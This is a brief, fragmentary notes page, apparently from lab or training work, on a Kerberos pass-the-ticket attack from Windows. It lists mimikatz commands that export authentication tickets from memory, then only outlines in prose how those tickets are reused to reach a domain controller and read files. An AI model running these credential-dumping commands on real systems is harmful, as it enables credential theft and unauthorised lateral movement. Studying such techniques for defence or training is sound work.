Pass the Ticket (PtT) from Windows

June 11, 2024

mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit

# Then 
dir *.kirbi

Now we can perform pass the ticket

First we have to enter powershell

Then we can access the DC01

ORRRRR FASTER WAY TO VIEW THE .txt FILE

To read the john.txt in john directory


Now we are going to try rubues.exe

Now we can view the files from dc01 john

We can also connect via powershell

You could also do it like this

Last updated